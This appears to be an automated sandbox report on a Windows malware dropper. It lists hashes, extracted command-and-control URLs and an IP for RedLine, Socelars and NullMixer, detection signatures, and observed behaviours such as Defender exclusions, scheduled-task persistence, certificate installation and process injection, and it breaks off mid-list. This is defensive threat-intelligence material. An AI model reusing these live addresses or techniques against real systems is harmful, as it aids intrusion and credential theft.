Analysis
-
max time kernel
67s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-12-2024 02:30
Static task
static1
General
-
Target
b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
b65c0ff839f99dc7e62be3f78b625b78
-
SHA1
2b1513c05230d9fa10249ff37bd2365e4188350e
-
SHA256
2a7a01bdce9c9583c8a67f062615012c3e569fbadcabdc6369c118016acfc248
-
SHA512
3794b8554d972ac547adcb6556a0af2bf3358ab4b820201575f46017304dd8ed863c8830cfcfe8c652436f9779cbc9621f67f01fd45153c7aad91d4ff9ef505f
-
SSDEEP
98304:x8CvLUBsgiJ1a8a2a0wO78eCI5BJ3NVW9AQPOEpssjk:xhLUCg+gbQ71/1NohPOhsI
Malware Config
Extracted
nullmixer
http://watira.xyz/
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
redline
Build1
45.142.213.135:30058
Signatures
-
Nullmixer family
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Privateloader family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2772-288-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2772-285-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2772-283-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2772-291-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral1/memory/2772-289-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/2772-288-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2772-285-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2772-283-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2772-291-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat behavioral1/memory/2772-289-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Sectoprat family
-
Socelars family
-
Socelars payload 4 IoCs
Processes:
resource yara_rule behavioral1/files/0x0009000000016da7-13.dat family_socelars behavioral1/files/0x0015000000018676-109.dat family_socelars behavioral1/memory/2568-235-0x0000000000400000-0x0000000000B33000-memory.dmp family_socelars behavioral1/memory/2568-245-0x0000000000400000-0x0000000000B33000-memory.dmp family_socelars -
Vidar family
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2912-269-0x0000000000400000-0x0000000002CC9000-memory.dmp family_vidar -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Processes:
resource yara_rule behavioral1/files/0x0008000000016ce1-25.dat aspack_v212_v242 behavioral1/files/0x0008000000016c8c-27.dat aspack_v212_v242 behavioral1/files/0x0007000000016d47-33.dat aspack_v212_v242 -
Executes dropped EXE 20 IoCs
Processes:
setup_install.exe7825532f6c2.exea2a6801744812e74.exe820bce1606.exedf026da6d481.exe0fd0e7409d7.exee7536a043.execbf3f5f878.exedf026da6d48010.exedf026da6d481.exe1cr.exea1b28248bb94015.exe8acd9b3697086429.exechrome2.exesetup.exewinnetdriv.exeservices64.exe1cr.exe1cr.exeBUILD1~1.EXEpid Process 2568 setup_install.exe 2508 7825532f6c2.exe 2660 a2a6801744812e74.exe 2248 820bce1606.exe 2060 df026da6d481.exe 1472 0fd0e7409d7.exe 2912 e7536a043.exe 1628 cbf3f5f878.exe 592 df026da6d48010.exe 2028 df026da6d481.exe 1956 1cr.exe 2204 a1b28248bb94015.exe 2380 8acd9b3697086429.exe 2604 chrome2.exe 1520 setup.exe 2264 winnetdriv.exe 752 services64.exe 540 1cr.exe 2772 1cr.exe 1248 BUILD1~1.EXE -
Loads dropped DLL 55 IoCs
Processes:
b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exesetup_install.execmd.execmd.execmd.execmd.exe7825532f6c2.execmd.execmd.exe820bce1606.execmd.exee7536a043.exedf026da6d481.execmd.execmd.exe1cr.exea1b28248bb94015.execmd.exedf026da6d481.exe8acd9b3697086429.exesetup.exeWerFault.exechrome2.exe1cr.exeBUILD1~1.EXEpid Process 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 2568 setup_install.exe 1108 cmd.exe 1108 cmd.exe 2824 cmd.exe 376 cmd.exe 1716 cmd.exe 2508 7825532f6c2.exe 2508 7825532f6c2.exe 2164 cmd.exe 1984 cmd.exe 1984 cmd.exe 2164 cmd.exe 2248 820bce1606.exe 2248 820bce1606.exe 1820 cmd.exe 2912 e7536a043.exe 2912 e7536a043.exe 2060 df026da6d481.exe 2060 df026da6d481.exe 2832 cmd.exe 1816 cmd.exe 2060 df026da6d481.exe 1956 1cr.exe 1956 1cr.exe 2204 a1b28248bb94015.exe 2204 a1b28248bb94015.exe 2836 cmd.exe 2028 df026da6d481.exe 2028 df026da6d481.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2508 7825532f6c2.exe 2508 7825532f6c2.exe 1520 setup.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2604 chrome2.exe 1956 1cr.exe 1956 1cr.exe 2772 1cr.exe 2772 1cr.exe 1248 BUILD1~1.EXE 1248 BUILD1~1.EXE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
df026da6d48010.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" df026da6d48010.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 73 iplogger.org 74 iplogger.org 96 raw.githubusercontent.com 97 raw.githubusercontent.com 10 iplogger.org 12 iplogger.org 51 iplogger.org 52 iplogger.org -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ipinfo.io 16 api.db-ip.com 17 api.db-ip.com 6 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
1cr.exedescription pid Process procid_target PID 1956 set thread context of 2772 1956 1cr.exe 75 -
Drops file in Windows directory 2 IoCs
Processes:
setup.exedescription ioc Process File created C:\Windows\winnetdriv.exe setup.exe File opened for modification C:\Windows\winnetdriv.exe setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 2440 2568 WerFault.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
820bce1606.exeBUILD1~1.EXEcmd.execmd.execmd.execmd.exe1cr.execmd.exewinnetdriv.exe1cr.exe7825532f6c2.execmd.exedf026da6d481.exetaskkill.execmd.exee7536a043.execmd.execmd.execmd.exesetup.execmd.exe8acd9b3697086429.exea1b28248bb94015.exeIEXPLORE.EXEb65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.execmd.exedf026da6d481.exesetup_install.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 820bce1606.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BUILD1~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winnetdriv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1cr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7825532f6c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df026da6d481.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e7536a043.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8acd9b3697086429.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1b28248bb94015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df026da6d481.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
e7536a043.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e7536a043.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e7536a043.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 540 taskkill.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{85967EA1-B055-11EF-8778-C60424AAF5E1} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe -
Processes:
0fd0e7409d7.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 0fd0e7409d7.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 0fd0e7409d7.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 0fd0e7409d7.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 1856 schtasks.exe 1584 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
e7536a043.exechrome2.exe8acd9b3697086429.exe1cr.exepowershell.exepid Process 2912 e7536a043.exe 2912 e7536a043.exe 2912 e7536a043.exe 2912 e7536a043.exe 2604 chrome2.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 2380 8acd9b3697086429.exe 1956 1cr.exe 1956 1cr.exe 2728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
a1b28248bb94015.exe0fd0e7409d7.exea2a6801744812e74.exetaskkill.exechrome2.exe1cr.exepowershell.exe1cr.exedescription pid Process Token: SeCreateTokenPrivilege 2204 a1b28248bb94015.exe Token: SeAssignPrimaryTokenPrivilege 2204 a1b28248bb94015.exe Token: SeLockMemoryPrivilege 2204 a1b28248bb94015.exe Token: SeIncreaseQuotaPrivilege 2204 a1b28248bb94015.exe Token: SeMachineAccountPrivilege 2204 a1b28248bb94015.exe Token: SeTcbPrivilege 2204 a1b28248bb94015.exe Token: SeSecurityPrivilege 2204 a1b28248bb94015.exe Token: SeTakeOwnershipPrivilege 2204 a1b28248bb94015.exe Token: SeLoadDriverPrivilege 2204 a1b28248bb94015.exe Token: SeSystemProfilePrivilege 2204 a1b28248bb94015.exe Token: SeSystemtimePrivilege 2204 a1b28248bb94015.exe Token: SeProfSingleProcessPrivilege 2204 a1b28248bb94015.exe Token: SeIncBasePriorityPrivilege 2204 a1b28248bb94015.exe Token: SeCreatePagefilePrivilege 2204 a1b28248bb94015.exe Token: SeCreatePermanentPrivilege 2204 a1b28248bb94015.exe Token: SeBackupPrivilege 2204 a1b28248bb94015.exe Token: SeRestorePrivilege 2204 a1b28248bb94015.exe Token: SeShutdownPrivilege 2204 a1b28248bb94015.exe Token: SeDebugPrivilege 2204 a1b28248bb94015.exe Token: SeAuditPrivilege 2204 a1b28248bb94015.exe Token: SeSystemEnvironmentPrivilege 2204 a1b28248bb94015.exe Token: SeChangeNotifyPrivilege 2204 a1b28248bb94015.exe Token: SeRemoteShutdownPrivilege 2204 a1b28248bb94015.exe Token: SeUndockPrivilege 2204 a1b28248bb94015.exe Token: SeSyncAgentPrivilege 2204 a1b28248bb94015.exe Token: SeEnableDelegationPrivilege 2204 a1b28248bb94015.exe Token: SeManageVolumePrivilege 2204 a1b28248bb94015.exe Token: SeImpersonatePrivilege 2204 a1b28248bb94015.exe Token: SeCreateGlobalPrivilege 2204 a1b28248bb94015.exe Token: 31 2204 a1b28248bb94015.exe Token: 32 2204 a1b28248bb94015.exe Token: 33 2204 a1b28248bb94015.exe Token: 34 2204 a1b28248bb94015.exe Token: 35 2204 a1b28248bb94015.exe Token: SeDebugPrivilege 1472 0fd0e7409d7.exe Token: SeDebugPrivilege 2660 a2a6801744812e74.exe Token: SeDebugPrivilege 540 taskkill.exe Token: SeDebugPrivilege 2604 chrome2.exe Token: SeDebugPrivilege 1956 1cr.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2772 1cr.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid Process 820 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid Process 820 iexplore.exe 820 iexplore.exe 2896 IEXPLORE.EXE 2896 IEXPLORE.EXE 2896 IEXPLORE.EXE 2896 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exesetup_install.execmd.execmd.exedescription pid Process procid_target PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 3020 wrote to memory of 2568 3020 b65c0ff839f99dc7e62be3f78b625b78_JaffaCakes118.exe 30 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 1108 2568 setup_install.exe 32 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 2824 2568 setup_install.exe 33 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 1716 2568 setup_install.exe 34 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 2164 2568 setup_install.exe 35 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 1816 2568 setup_install.exe 36 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 376 2568 setup_install.exe 37 PID 2568 wrote to memory of 1984 2568 setup_install.exe 38 PID 2568 wrote to memory of 1984 2568 